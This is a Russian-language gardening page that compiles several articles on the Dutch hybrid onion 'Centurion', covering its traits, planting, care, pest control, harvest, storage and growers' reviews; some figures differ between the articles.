1 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Особенности сорта лука центуриона

Сорт лука Центурион

При выборе лука для посадки, нужно обращать внимание на многие критерии. Важно, чтобы сорт или гибрид был не только урожайным, но также отвечал вкусовым, внешним качествам. Лук Центурион ценится за средние размеры и приятные вкусовые качества. Подробно про особенности этого гибрида можно узнать из этой статьи.

Описание сорта лука Центурион

Лук Центурион был выведен в Голландии группой профессиональных селекционеров и относится к гибридам. Вегетативный цикл двухгодичный. На первый год сажается чернушка и выращивается севок, а на следующий год сажается севок и получают лук-репку. Срок созревания среднеранний – всего через 90-110 дней после посадки можно собирать урожай.

Мякоть белая, с высоким содержанием сока

Масса головки лука 90-100 г в среднем. Форма вытянутая. У головки лука узкое донце, а шейка тонкая, что значительно упрощает чистку. Шелуха золотисто-коричневая, сухая. Головка отличается плотностью. Мякоть белая, с высоким содержанием сока. Вкус приятный, универсальный. Этот лук годится для свежих салатов и для термической обработки. Кушать можно не только головку этого лука, но и перья.

Характеристики гибрида

У гибрида Центурион есть определенные качества, что отличают его от многих других видов лука.

Хорошая всхожесть семян и прорастание севка

  • Хорошая всхожесть семян и прорастание севка.
  • По мере роста лук не пускает стрелку.
  • Есть иммунитет ко многим заболеваниям.
  • Вредители редко селятся на луке Центурион.
  • Культура хорошо переносит засуху, обилие дождей, резкие перепады температур.
  • Урожай имеет товарные качества.
  • Лук Центурион пригоден для длительной перевозки.
  • Урожайность с квадратного метра посадок доходит до 4 кг.
  • Длительный срок хранения.

Подготовка лука Центурион к посадке

Участок под лук выбирается хорошо освещенный, не заболоченный

Гибридный лук Центурион можно выращивать в разных климатических зонах, потому что он с легкостью приспосабливается к самым разнообразным местам выращивания. Участок под лук выбирается хорошо освещенный, не заболоченный, желательно на возвышенности или равнине.

Посадка проводится, когда на улице установится температура в пределах +10…+15 градусов (середина апреля). Можно сажать этот лук и под зиму. В этом случае, посадка проводится за 2-3 недели до сильных, постоянных морозов.

Участок сначала очищают от сорняков, потом удобряют (перегноем, пометом, минералами), снижают кислотность, по необходимости. После этого земля перекапывается на полный штык лопаты, разравнивается. Земля для лука должна быть рыхлой, легкой. Если она глинистая, то в нее обязательно нужно добавить торф, песок.

У головки лука узкое донце, а шейка тонкая, что значительно упрощает чистку

Посадка лука Центурион

Лук-севок Центурион для посева можно купить в специализированном магазине. Перед посадкой его необходимо перебрать, чтобы исключить все луковички, что повреждены или больны. После этого севок нужно рассортировать по размеру. Сажать его нужно будет также по размеру – сначала мелкий, потом средний и крупный.

Лук сажается в рядочки. Перед посадкой землю нужно полить водой. Заглубляется севок на 3 см, не больше. Сажать его нужно так, чтобы хвостик оставался над поверхностью земли! Расстояние между севком делается в 10-15 см, а между рядами – 20-30 см. Лук сажается аккуратно, чтобы не повредились небольшие корешки севка, а затем прижимается почва вокруг луковичек, чтобы они плотно сидели в грунте.

Сажать его нужно так, чтобы хвостик оставался над поверхностью земли!

Если для посадки используется чернушка, а не севок, то нужно ее сеять сначала густо. Когда появится 2 первых пера, рядок прореживают. После появления 4 пера, посадки еще раз прореживают. В это время между луковичками должно быть около 5 см свободного пространства, тогда сможет вырасти аккуратный и красивый севок.

Уход за культурой

Для правильного, равномерного роста, лук Центурион нуждается в качественном уходе.

    Поливы проводятся по мере подсыпания почвы. Нельзя часто поливать лук, иначе появятся гнили. В то же время без своевременных поливов этот лук не сможет расти. Если на улице жарко, поливы учащаются, а если регулярно идут дожди, то можно прекратить их на время. Когда начинает расти головка лука, поливы сокращают, а за 2-3 недели до сбора урожая – вообще прекращают, чтобы подземная часть лука смогла вызреть.

Рыхление земли крайне необходимо

Уборка и хранение урожая

Подкормки можно проводить минералами или органикой

В зависимости от периода посадки лука, урожай собирается в разное время. Например, если посадить севок примерно в середине апреля, урожай можно будет собирать уже во второй половине июля. А при осенней посадке, сбор урожая проводится на несколько недель раньше.

Собирается лук Центурион только по сухой погоде. Его выкапывают и раскладывают по земле, просушиваться. После уборки, урожай можно использовать для продажи. Если же он выращивался для собственных нужд, то его перебирают, фасуют и укладывают на хранение. Храниться лук Центурион может около полугода при комнатной температуре. А если сделать для него хорошие условия, создать правильную температуру (+3 градуса), влажность (60-80%), то лежать он будет целый год!

Отзывы о сорте лука Центурион

Мнения огородников о луке Центурион преимущественно положительные.

  • Антон Макаров: «Уже не первый раз сажаю лук Центурион на головку. Лук очень вкусный, для любого типа обработки, и чистится без проблем. Но в плане выращивания, раз на раз не приходится. В прошлом году он уродил как никогда – часть урожая даже на продажу пошла, потому что не знал, куда его девать. Но еще буквально 3 года назад, урожая почти не было – мелкие головки, не товарного вида. Не знаю, от чего это зависит, может от погоды, но в плане ухода ничего не изменилось».
  • Наталья Стужа: «Несмотря на длительную засуху прошлым летом, лук Центурион вырос и дал хороший урожай. Правда, мы его поливали часто, делали подкормки, чтобы сопротивляемость повысить. В плане вкуса для меня это лучший сорт – не острый и не сладкий – идеальная середина. Урожай свой храним в подвале, в сетках. Лежит лук не меньше 6 месяцев, но может и больше, если перебирать его вовремя».
  • Валентин Пальмов: «Уже третий год сажаю лук Центурион, и он еще ни разу меня не подводил. Время потраченное на посадку, уход окупается большим урожаем, ровными, красивыми головками. Думаю отчасти причина в том, что это гибрид и, к сожалению, семена, собранные с него не плодоносят. И все же луком этим я доволен. Всегда для посадки закупаю севок. Главное только правильно подготовить почву и сам посадочный материал, и урожай не заставит себя долго ждать».

Высокоурожайный гибрид лука с потрясающим вкусом – «Центурион»

Лук Центурион пришел в Россию из Голландии и быстро завоевал популярность среди отечественных фермеров. У овощей насыщенный вкус и яркий аромат, они содержат много полезных веществ, универсальны в применении. Культура неприхотлива в уходе, высокоурожайна. Луковицы полностью вызревают после дозаривания, долго хранятся.

Описание гибрида

Центурион — гетерозисный гибрид первого поколения. Его луковицы пригодны для употребления в свежем виде, добавления в приправы и соусы, консервации и блюда, требующие варки, тушения или жарки.

Происхождение и развитие

Центурион — гибрид голландской селекции, оригинатор — компания BEJO ZADEN B.V.

В Госреестр России культуру включили в 2006 году.

Состав и полезные свойства

Лук содержит:

  • витамины группы B, C, PP, E;
  • фтор;
  • железо;
  • йод;
  • цинк;
  • фитонциды;
  • сахара;
  • эфирные масла;
  • органические кислоты.

Овощ обладает антимикробным и противовирусным действиями, нормализует пищеварение, повышает иммунитет, снижает артериальное давление, уровень сахара и холестерина в крови.

Срок созревания, урожайность и иммунитет

Этот среднеранний лук созревает в течение 90 дней. Товарная урожайность — 252–420 ц/га, максимальная — 580 ц/га.

Центурион устойчив к пероноспорозу и шейковой гнили, но поражается мучнистой росой и альтернариозом.

Характеристики

Растение формирует темно-зеленые трубчатые листья высотой 80 см. Луковицы одно– или двухзачатковые, широкообратнояйцевидной формы, весят по 110–150 г, покрыты 3-4 чешуйками коричнево-золотистого цвета. Мякоть белая, вкус острый.

Для каких регионов подходит

Гибрид включен в Госреестр по Центральному региону, но с учетом особенностей климата при посадке и выращивании лука его культивируют во всех областях страны.

Главные преимущества и недостатки

Достоинства гибрида:

  • высокая урожайность;
  • приятный вкус;
  • хорошие товарные качества;
  • отсутствие стрелкования;
  • длительное хранение;
  • возможность выращивания в разных климатических условиях;
  • хорошие всхожесть семян и прорастание севка;
  • иммунитет к заболеваниям;
  • устойчивость к засухе, обилию осадков и резким температурным колебаниям.

К недостаткам лука относят необходимость ежегодной покупки семян или севка.

Отличия от других

Сравнение Центуриона с другими гибридами и сортами лука представлено в таблице:

Название Срок созревания Урожайность, ц/га Форма луковиц Вес луковиц, г Вкус
Центурион F1 Среднеранний 252–420 Широкообратнояйцевидная 110–150 Острый
Ламика F1 Среднеспелый 302–341 Широкообратнояйцевидная 90–100 Полуострый
Сибирь Раннеспелый 219–530 Широкоэллиптическая 80–100 Полуострый
Альбион F1 Среднеспелый 167–220 Округлая 70–100 Полуострый

Посадка и выращивание

Центурион — лук с двухгодичным циклом вегетации. В первый год проводят посев, во второй — сажают севок, который и дает урожай полноценных репок.

Справка! Гибрид подходит как для весенней, так и для подзимней посадки.

Подготовка

Предварительно семена замачивают в светлом растворе марганцовки или теплой воде с добавлением стимуляторов роста, затем заворачивают в ткань и оставляют на 3 суток при комнатной температуре до появления небольших ростков.

Севок выбирают не больше 2 см в диаметре. Подходят сухие экземпляры без повреждений, гнили и неприятного запаха, покрытые шелухой соломенного цвета. Перед посадкой лук дезинфицируют раствором медного купороса (1 ч. л. вещества на ведро воды) и прогревают при температуре +30…+40°C.

Землю на участке заранее перекапывают, очищают от сорняков и растительных остатков, вносят древесную золу, навоз или калийно-фосфорные удобрения для снижения кислотности и обогащения питательными веществами. В глинистую землю добавляют торф и песок.

Требования к грунту

Гибрид предпочитает легкую плодородную почву, которая хорошо пропускает влагу, воздух и имеет нейтральный уровень кислотности.

Сроки, схема и правила посадки

Для выращивания рассады посев проводят сразу в открытый грунт или небольшие ящики, контейнеры. Делают это в конце февраля–начале марта, заглубляя семена не более чем на 3 см, соблюдая расстояние между ними в 10 см.

Предварительно закаленную рассаду пикируют в грунт с середины апреля по начало мая, когда грунт прогреется минимум до +15°C на глубине 12–15 см..

Схема пикировки:

  1. На подготовленном участке делают бороздки глубиной до 4 см, оставив между ними по 20–25 см.
  2. В бороздах делают посадочные углубления через каждые 10–15 см.
  3. Обильно поливают грунт теплой водой.
  4. Извлекают саженцы из емкостей и помещают в лунки.
  5. Засыпают землей и слегка уплотняют.

Севок высаживают весной или под зиму, примерно за 2-3 недели до первых заморозков.

Схема посадки лука-севка Центурион:

  1. Готовят борозды глубиной в 4 см на расстоянии 25–30 см друг от друга.
  2. Поливают их теплой водой.
  3. Высаживают луковицы в борозды через каждые 10 см, заглубляя на 3-4 см.
  4. Присыпают сверху землей, немного утрамбовывают.

Особенности выращивания

Лук Центурион хорошо развивается при температуре +12…+16°C, ярком и продолжительном освещении и обильном поливе в начале активного роста.

Оптимальное место для культуры — открытый солнечный участок, защищенный от сильного ветра и сквозняков.

Не высаживают Центурион на одном и том же месте чаще 1 раза в 3 года. Лучшие предшественники: томаты, огурцы или картофель.

Нюансы ухода

Получают обильный урожай лука при надлежащем уходе за ним.

Режим полива

После посадки севка в грунт и до конца июня культуру поливают часто и обильно, примерно раз в неделю. Примерный расход воды — 8 л на 1 м2.

С началом формирования луковиц орошение сокращают, а за 3 недели до уборки урожая прекращают совсем.

Рыхление и прополка

После каждого увлажнения или минимум 1 раз в 10 дней землю рыхлят, чтобы избежать образования корки на поверхности и улучшить доступ кислорода, влаги и питательных веществ к луковицам.

Пропалывают по мере роста сорной травы, которая лишает культуру питательных веществ, провоцирует гниение овощей и привлекает вредителей.

Подкормка

Схема внесения удобрений:

  • через 14 дней после появления всходов — минеральные удобрения (разведенные в воде аммиачная селитра, суперфосфат или хлористый калий);
  • спустя 2 недели — органические вещества (на 5 л воды берут 1 л навоза, настаивают в течение 2-3 недель, разводят водой 1:6).

Третья подкормка необязательна. Если ее проводят, то используют комплексные препараты: например, нитрофоску (2 ст. л. на 10 л воды).

Важно! Рекомендуется применять удобрения в жидком виде, так как сухие обжигают растения.

Борьба с болезнями и вредителями

Если растения поразила мучнистая роса, спасти их не удастся. Это заболевание предупреждают профилактической обработкой посадок фунгицидами. Их же используют при развитии и для предупреждения альтернариоза.

Среди вредителей Центурион атакуют луковая моль и муха, против которых применяют инсектициды.

В качестве профилактики поражения посадок соблюдают правила севооборота, следят за влажностью почвы.

Сбор и хранение урожая

Сигналом о спелости урожая служат прекращение роста новых листьев и увядание старых.

Лук убирают во второй половине июля, в жаркую сухую погоду, осторожно вытягивая репки из земли.

Особенности хранения и лежкость

Собранные луковицы осматривают и сортируют, выбрасывая все поврежденные экземпляры. После просушивают в затененном месте в течение 2-3 дней, срезают увядшие перья, оставляя кончик длиной 4-5 см.

Кстати! Центурион вызревает после дозаривания на 100%.

Держат овощи в темном, хорошо проветриваемом и сухом помещении при температуре +1…+3°C. При соблюдении правил хранения урожай не портится в течение 6 месяцев и более.

Трудности при выращивании

Проблемы, с которыми сталкиваются фермеры, культивируя Центурион:

  • гниение лука при повышенной влажности почвы;
  • вторичный рост культуры при несвоевременной уборке урожая;
  • медленное развитие и плохой рост луковиц при посадке овощей в грунт с повышенной кислотностью.

Советы опытных огородников

Фермеры рекомендуют:

  • хранить урожай в песке: так он меньше портится;
  • при выращивании лука на перо после каждой срезки подкармливать посадки азотными удобрениями: они стимулируют наращивание зеленой массы;
  • не удобрять овощи свежим навозом: он привлекает вредителей;
  • высаживать рядом с луком укроп, чтобы отпугивать вредных насекомых.

Отзывы

Огородники отзываются о луке Центурион в основном положительно:

Антон, Брянская обл.: «Уже несколько лет сажаю лук Центурион, мне нравится его вкус и лежкость. Однако есть и довольно существенный минус: сложно предугадать, каким будет урожай. В прошлом году продуктивность была выше всяких похвал, часть овощей даже продал, но вот года 3 назад лука почти не было: головки очень мелкие, некрасивые, много испорченных. Возможно, погода повлияла, потому что ухаживал за посадками, как и всегда».

Наталья, Костромская обл.: «В прошлом году выдалось засушливое лето, но урожай, несмотря на это, был отменным. Конечно, мы ухаживали за посадками: поливали их, подкармливали, но все же погода обычно сказывается. По вкусу лук нравится: острый, мы как раз такой любим. Лежкость отличная, хранятся овощи не меньше полугода».

Владимир, Орловская обл.: «Всегда приходилось читать описание сортов, отзывы, смотреть фото, чтобы выбрать оптимальную культуру для посадки, пока не наткнулся на гибрид Центурион. Сажаю его уже 3 года, но ни разу он не подвел. Выращиваю из семян рассаду, из нее — севок, а потом — крупные луковицы. Времени на это, конечно, много уходит, но оно того стоит: урожайность отменная, лук вкусный, хранится долго».

Заключение

Результат голландской селекции, лук Центурион, прочно занял позиции на приусадебных участках и фермерских хозяйствах России. Этот гибрид подходит для культивации во всех регионах страны, характеризуется высокой урожайностью, отличными товарными качествами и высокой лежкостью при хранении.

Лук «центурион»: описание сорта, особенности выращивания и отзывы

Издавна лук ценился за свои полезные свойства. Он нашел свое применение в кулинарии и народной медицине. Этот целебный овощ обладает массой полезных веществ. Он наполняет организм необходимыми витаминами и помогает в борьбе с воспалительными процессами и инфекциями. Чтобы обеспечить свою семью запасом этого витаминного продукта, лучше вырастить его на своем участке. Лук «центурион» пользуется спросом среди потребителей и популярностью у многих огородников. В статье мы подробно расскажем об этом сорте и особенностях его выращивания.

Описание

Сорт с необычным названием был выведен голландскими селекционерами. Он вобрал в себя лучшие качества лука «штутгартен ризен» немецкой селекции. Показал хорошие результаты всхожести и урожайности. Очень подходящий сорт для реализации. При выращивании на перо гибрид почти не желтеет и радует высокой и сочной зеленью. Лук «центурион» любят высаживать дачники, так как он является весьма рациональной культурой. На 1 м 2 вырастает около 4 кг корнеплодов.

Достоинства сорта

Лук привлекает многих любителей-огородников тем, что может произрастать в разных регионах страны. Его выращивают и в условиях сурового климата в теплицах. Ценится он и за раннее созревание луковиц.

Характеристика сорта лука «центурион» :

  • морозоустойчив;
  • ранне-средний сорт, срок созревания с момента всхожести – 3 месяца;
  • не подвержен стрелкованию;
  • устойчив к заболеваниям;
  • отличается плотностью и хорошей сохранностью плодов;
  • транспортабельный;
  • славится качеством семенного материала;
  • подходит для возделывания в промышленных масштабах.

Характеристика плодов

Некоторые достоинства, которыми славится ценный сорт, он имеет благодаря строению плодов. В описании и отзывах о луке «центурион» объясняется одна важная деталь: чтобы урожай хорошо сохранился, луковая шейка должна быть сухой. У данного сорта она тонкая, и процесс ее увядания происходит быстрее. Сухая шейка препятствует размножению микроорганизмов и попаданию их внутрь плода. Сорт может храниться до 7-8 месяцев, не теряя при этом вкусовых качеств и сохраняя великолепный здоровый вид.

По внешнему описанию сорта лук «центурион» мало чем отличается от своих собратьев. Он имеет классический золотистый цвет шелухи и белую мякоть, с едва заметным желто-зеленым отливом.

Его особенность в том, что по своей величине головки не бывают слишком крупными. Также они имеют вытянутую конфигурацию, что является очень практичным для хозяек. Из-за такой формы луковицу удобно нарезать, а оптимальный размер соответствует запросам людей, поскольку после приготовления блюд не приходится оставлять отходы. Средний вес одной головки около 90 г.

У плодов гибрида полностью отсутствует приторная горечь. Они имеют пикантный вкус, разбавленный легкой остротой, и аппетитный аромат. Лук подходит для употребления в сыром виде, консервации и приготовления блюд с разной термической обработкой.

Листья трубчатой формы славятся интенсивным ростом и красивым ярко-зеленым окрасом. При хорошем уходе они достигают до 70 см в высоту.

Лук-севок

Лук-репка обычно выращивается в течение двух лет. Настоящий урожай получают на второй год после посадки. Урожай, который можно получить из семян в первый сезон высева – это лук-севок. В описании сорта «центурион» они представляют собой мелкие удлиненные луковички диаметром около 2 см. Именно из них получают качественные крупные корнеплоды. Севок адаптирован к различным климатическим условиям и имеет высокий потенциал урожайности. Но это при условии, если соблюдать все правила подготовки к посадке.

Выбор посадочного материала является залогом будущего урожая, поэтому к этому вопросу нужно подойти ответственно. Покупать луковички лучше у проверенных производителей или в специализированных магазинах. При этом их нужно осмотреть: они не должны быть порчеными, влажными или подгнившими.

Перед посадкой осуществляют обработку посадочного материала. Лук-севок нужно подержать в солевом или марганцевом растворе. Затем разложить на ткань и хорошо просушить.

Выбор места и подготовка почвы

Для посадки лука «центурион» лучше подойдут открытые, возвышенные и не затененные участки. При выборе места следует учитывать глубину залегания грунтовых вод, поскольку повышенную влажность эта культура не переносит. Соблюдение севооборота является обязательным мероприятием при выращивании этого сорта. А значит, на прежнее место его сажать нельзя.

Супесчаный грунт будет идеальным вариантом для лука. Если почва на участке кислая, в нее вносят известь или золу за 1 год до посадки. Высадив культуру в кислый грунт, можно понести существенный урон в количестве урожая.

Подготовка участка начинается с очищения его от сорняков. Такая предварительная уборка значительно повлияет на качество лука.

Осуществляя перекопку на глубину 30 см, одновременно вносят необходимые удобрения.

Посадка

Лук-севок высаживают в конце сентября или начале октября, за две недели до наступления морозов. За этот промежуток времени луковицы получат определенную закалку и необходимое количество влаги. Посадка лука «центурион» под зиму дает возможность получить ранний урожай зелени. Она будет расти гораздо активнее, чем та, которая будет произведена весной.

Лук этого сорта нельзя сажать глубоко. Для него готовят лунки с расстоянием междурядий 25 см.

Непосредственно перед посадкой рекомендуется внести суперфосфат, перепревшую органику и древесную золу.

Севок размещают в лунки на одинаковом расстоянии. Интервал в ряду от одной луковички к другой оставляют около 10 см, а углубляют на 6 см.

Высаженную культуру покрывают рыхлой землей, после чего ее немного утрамбовывают.

Весной лук «центурион» высаживают только в хорошо прогретую землю. Это нужно делать, когда погода стабилизируется и дневная температура будет постоянно держаться не менее +10°С. Нужно, чтобы верхний слой почвы был прогрет до +14°С. Гибрид способен переносить заморозки до -4°С. Однако нужно выжидать погоду, когда этот показатель будет проявляться только ночью.

Посев семян

Высев семян производят в конце апреля. Посадка семенного материала включает несколько последовательных действий:

  • Для лучшего проращивания семена предварительно замачивают на сутки в чистой воде с добавлением стимулятора роста. Мокрыми их помещают в ткань и сверху укутывают пленкой.
  • Готовят длинные борозды глубиной 3 см и дистанцией около 18.
  • В канавки вносят такие же удобрения, как и для лука-севка.
  • Семена равномерно рассеивают по бороздкам.
  • После высева семян грунт нужно утрамбовывать сильнее, чем при посадке луковиц. Для этого можно использовать валик или специальные инструменты для укатки.

Особенности выращивания

Для такой культуры, как лук, очень важно рыхлить почву и своевременно уничтожать сорную траву. Такие приемы будут содействовать поступлению кислорода в грунт и сохранению необходимых элементов, которые могут отбирать у растений сорняки.

В обильных поливах культура нуждается в период вегетации. Если лук не будет получать достаточно влаги, то это может привести к пожелтению зеленой массы.

В промежуток времени, когда начинают развиваться корнеплоды, увлажнения сокращают. Растения поливают по мере необходимости.

За 20 дней до уборки урожая поливы полностью отменяют. Плоды, чрезмерно напитанные влагой, не будут долго храниться и могут начать гнить.

Как только появятся и немного подрастут первые всходы, их необходимо удобрить азотом. На втором этапе развития лук нуждается в обеспечении калием.

При выращивании лука на зелень подкормки осуществляются в другом порядке. Вначале культуру удобряют нитроаммофоской и золой. Эту процедуру осуществляют два раза, с интервалом в 7 дней. Далее, после каждой очередной срезки пера вносят комплексные удобрения с обязательным наличием азота.

К счастью, устойчивость сорта лука «центурион» освобождает огородника от лишних хлопот.

Однако угрозу для этой культуры представляет луковая муха и моль. Вредители откладывают яйца под зелеными перьями и подсохшими чешуйками лука. Чтобы не дожидаться, когда такие посетители испортят всходы, нужно вовремя провести обработку растений с помощью инсектицидов. Если рядом с луковыми грядками высаживать морковь – это предотвратит нашествие вредных насекомых.

Уборка лука

Признаком того, что пришло время для уборки лука, служит его подсохшая шейка. В этот период она уже не в состоянии удерживать перья, и они полегают на землю.

Надземная часть растения на момент сбора урожая должна быть уже высохшей. Если лук собрать раньше времени, то при хранении он будет гнить. Запоздалая уборка может также преподнести нежелательный сюрприз, который проявляется в преждевременном прорастании луковиц.

Когда корнеплоды уже собраны, их необходимо подвергнуть просушке. Лучше это делать на солнечных местах, разложив луковицы в один слой. В дождливую погоду можно воспользоваться навесом.

Перед тем как отправить лук на хранение, его обрезают и складывают в деревянные ящики. Их опускают в подвал, так как в жилых помещениях корнеплоды начнут гнить или прорастать. Идеальная температура для хранения лука – не выше +5°С.

Отзывы

О луке «центурион» отзывы просто замечательные. Многим нравится его вкус и форма плодов. Люди отмечают, что корнеплоды хорошо хранятся. Огородники, выращивающие лук на продажу, довольны его урожайностью и ранним созреванием. Их впечатляет красивая сочная зелень, которая не повреждается заболеваниями.

Заключение

Ознакомившись с характеристикой лука «центурион», огороднику не мешало бы обзавестись этим высококачественным гибридом. Для тех, кто еще не успел облюбовать для себя определенный сорт данной культуры, приобретение семенного материала описанного лука будет самым удачным выбором.

Описание сорта лука севка центурион и его характеристики

Большинство огородников и масштабные фермерские хозяйства отдают предпочтение перспективному сорту лука Центурион за нетребовательность в уходе, качественный урожай и продолжительный срок хранения.

Широко распространенная овощная культура относится к среднеранним сортам голландской селекции. Есть надежным гибридом, и показывает отличные результаты всхожести.

Описание и характеристика сорта лука центурион

Начнем с описания сорта. Растение достигает в высоту 80 см и обладает листьями трубчатой формы, окрашенными в насыщенный зеленый цвет. Сорт формирует головки среднего размера. Вес одного лука колеблется от 100 до 150г. Луковица круглой, немного вытянутой формы с плотной шелухой имеющей яркую соломенную окраску. Небольшая шейка создает надежный барьер от попадания в белую мякоть болезнетворных микробов, что защищает лук от загнивания.

Лук-севок Центурион крупным планом

Благодаря своей форме, небольшому донцу и узкой шейки овощ удобен для нарезания в отличие от других видов, имеющих шарообразную форму, которые дают много отходов. А вкус продукта, который характеризуется легкой остротой, пикантностью и нежным ароматом, абсолютно удовлетворяет требования кулинаров.

Преимущества

Сорт обладает массой достоинств, из-за которых вызывает особенный интерес у овощеводов. К положительным характеристикам относится:

  • высокая урожайность, с 1м2 посадок можно собрать от 4 кг репок;
  • успешное произрастание в различных климатических зонах;
  • отличные вкусовые качества сорта;
  • устойчивость к стрелкованию, поэтому сорт хорошо подходит для выращивания на перо;
  • стойкость к заболеваниям, свойственным данному сорту, из-за этого не нуждается в дополнительной обработке с использованием химических препаратов;
  • хорошо подходит для длительного хранения в домашних условиях;
  • продукт универсального назначения, употребляется как в свежем виде, так и подходит для консервирования.

Особенность и характеристика сорта позволяет Центуриону входит в высшую ценовую категорию, которая гарантирует достойную прибыль при коммерческом выращивании.

Сроки посадки

При возведении этого сорта важно правильно определиться со сроками посадки, потому как очень ранняя посадка может подвергнуть овощи к вымерзанию, а поздняя – не даст луковицам и перу полноценно развиться.

Главное условие, чтобы грунт прогрелся до 15̊ С тепла и при его несоблюдении урожай может быть маленьким.

Требование к почве

Выбирая участок для высадки необходимо обращать внимание на открытые и хорошо освещаемые территории. Хоть культура и влаголюбива, но чрезмерное количество воды не переносит, поэтому следует избегать мест, где близко к поверхности земли проходят грунтовые воды.

Для сорта Центурион лучше всего подходят супесчаные почвы. Уровень кислотности должен быть нейтральным, так как кислая почва приводит к значительной потери урожайности. Для снижения кислотности можно внести печную золу или цементную пыль за год до посадки.

Почву следует подготовить с осени, выполняя следующие агротехнические приемы:

  1. Очистить выбранный участок от сорняков, так как они негативно влияют на качество и количество урожая.
  2. Внести удобрения, разрыхляя при этом верхний слой грунта. Это поможет питательным веществам попасть вглубь, а также дополнительно ликвидировать остатки сорняков;
  3. Перед зимним периодом перекопать грядки на глубину около 25 см.

Выращивание лука центурион на грядках

Правила посева

Рекордные урожаи можно получить при двухгодичной схеме выращивания.

Особенности выращивания в первый год

Благоприятным периодом посева семян считается конец апреля – начало мая. Процесс посева включает следующий порядок действий:

  1. Перед посевом семена замочить на 24 часа в воде. Можно прибавить в воду стимуляторы роста. Затем выложить семена на материю и прикрыть пленкой.
  2. Приготовить посевные борозды глубиной 3-4 см, соблюдая дистанцию между ними 20см.
  3. Дно борозды оснастить удобрениями и равномерно поместить посадочный материал из расчета 3г семян на 1м2.
  4. Наверх насыпать рыхлый грунт и немножко уплотнить.

Урожайность севка может превышать 15т с 1га. Убирать севок можно на 90 день после посева. После чего его нужно подготовить к хранению и поместить на зиму в специально отведенное помещение с приемлемой температурой и уровнем влажности.

Основные правила в течение второго года выращивания

Предварительно необходимо перебрать севок, удаляя поврежденные и подгнившие экземпляры. После чего прогреть отобранные луковички для посадки под накрытием на протяжении 3 дней и перейти к процессу посадки севка.

  1. Сделать посадочные лунки, глубина которых составляет 6-8 см. Расстояние между рядами должно быть в пределах 10-12см.
  2. Внести органику, в качестве которой может послужить перепревший навоз, древесная зола.
  3. В приготовленные лунки поместить севок с дистанцией 8 см друг от друга.
  4. Лунки засыпать землей и слегка утрамбовать.

Комплекс мероприятий по уходу за луком

При выращивании любой овощной культуры важна не только надлежащая посадка, но и дальнейший уход, который обязан быть выполнен по всем правилам. Для этого необходимо:

  1. Проводить регулярный полив в период вегетации для активизации роста листьев, который к концу вегетативного роста уменьшить, а за 3 недели до уборки урожая полностью прекратить. Поливать следует бережно, не повреждая перо. Применять только теплую воду, так как холодная может спровоцировать появление ложной мучнистой росы.
  2. Осуществлять прополку вместе с рыхлением земли для обеспечения хорошего воздухообмена, это положительно отразиться на развитии овощной культуры;
  3. В положенное время очищать от сорняковых культур, поскольку они способствуют сохранению влажности на поверхности, что приводит к повышению риска появления устойчивости разных грибковых болезней. Также если не уничтожить вовремя сорняки шейка станет сочно и это отрицательно отразится на хранении овоща, так как он начнет гнить.
  4. Вносить питательные элементы, в зависимости от грунта, в которой высажен лук.
  5. Постоянно осматривать растения на предмет заболеваний и вредителей и при обнаружении проводить соответствующие мероприятия.

Сбор урожая лука центурион

Болезни и их профилактика

Самым распространённым вредителем лука сорта Центурион является луковая муха. При её воздействии листки неспособны к такому процессу, как тургор и, желтея, скручиваются. Избавляться от вредителя необходимо в крайние сроки, так как поражаются не только листья, но и плодоножка с семенами. Существует множество народных средств и химических препаратов, которые активно используют в борьбе с луковой мухой.

Также опасным вредителем может оказаться луковая моль, небольших коричневых бабочек. Вред в большей степени приносят не взрослые организмы, а личинки, которые выедают паренхиму растения. В целях профилактики нужно регулярно пропалывать грядки, и рационально распределять культуры посева. При лечении лука используют вещества, запах которых отпугивает насекомых. Это может быть как химическое средство, приобретённое в магазине, так и приготовленное в условиях дома.

Влажная весна с низкими температурами провоцирует появление ложной мучнистой росы. Так как дождевая вода накапливается на листьях лука и ускоряет развитие грибковых болезней, при появлении которых может заразиться вся грядка буквально за несколько дней. Для профилактики и лечения стоит использовать раз в 2 недели фунгициды.

Очень опасным бактериальным заболеванием лука Центуриона является донцевая гниль, которая попадает в растение через заражённую почву и сопровождается полным загниванием растения. От заболевания можно избавиться только путём использования специальных средств.

Сбор урожая и правила хранения

При профессиональной посадке и правильном уходе можно с лёгкостью достичь желаемых результатов. Период сбора лука наступает в тот момент, когда листья опускаются, а шейка не в состоянии ровно держать их.

За несколько недель до сбора урожая нужно прекратить полив и немного подсушить почву. Срезать луковицы аккуратно, не повреждая донышко. Перед уборкой на хранение нужно внимательно рассмотреть каждую луковичку и все подозрительные экземпляры отложить для использования в первую очередь.

При соблюдении требуемых условий период хранения может достигать 8 месяцев. Важно, чтобы помещение, в котором размещены овощи, было темное, прохладное и сухое.

Лук Центурион удивляет своим пикантным вкусом, который делает его популярным и востребованным продуктом в приготовлении кулинарных шедевров. При соблюдении всех агротехнических приемов по возведению и выполнении необходимых рекомендаций по уходу, можно собрать превосходный урожай лука крупных размеров.

Лук “Центурион”

Основные характеристики сорта

  • Сорт «Центурион» выведен голландскими селекционерами.
  • Сорт раннеспелый. Период от момента появления всходов до созревания длится 85-90 дней.
  • Листья растений имеют трубчатую форму, темно-зеленого цвета.
  • Высота растений составляет 75-80 см.
  • Чешуи спелой луковицы имеют желто-коричневый цвет, мякоть белого цвета.
  • Форма луковиц округлая.
  • Средняя масса луковицы составляет 120-130 г.
  • Луковицы имеют средне острый вкус.
  • Растения данного сорта устойчивы к стрелкованию и основным заболеваниям.
  • Наибольшие урожаи получают при двухгодичной схеме выращивания.

Особенности выращивания лука «Центурион» в первый год

Выбор участка

Для получения высоких урожаев нужно правильно выбрать участок. Основные требования к земельному участку следующие:

  1. Для сорта «Центурион» лучше всего подходят супесчаные почвы.
  2. Лучшими предшественниками вышеупомянутого сорта являются томаты, огурцы и ранний картофель.
  3. Участок должен быть хорошо освещенным и с достаточно выровненной поверхностью почвы.
  4. Нельзя выращивать данный сорт на тяжелых почвах с заболоченными участками.
  5. Не желательно выбирать участок с наличием большого количества многолетней сорной растительности.
  6. Сорт «Центурион» лучше всего растет на почвах с нейтральной кислотностью.
  7. Сорт приспособлен к длительному хранению.

Обработка почвы

  1. После окончания уборки предшественника в течении 2-3 дней нужно взрыхлить почву с целью уничтожения сорняков. Глубина рыхления составляет 2-3 см. В случае последующего появления сорняков рыхление почвы повторяют.
  2. В середине сентября проводят внесение перепревшего навоза на выбранный участок с нормой 5-6 кг. на 1 м2.
  3. Через 1-2 дня после внесения органического удобрения почву пашут на глубину 15-17 см.
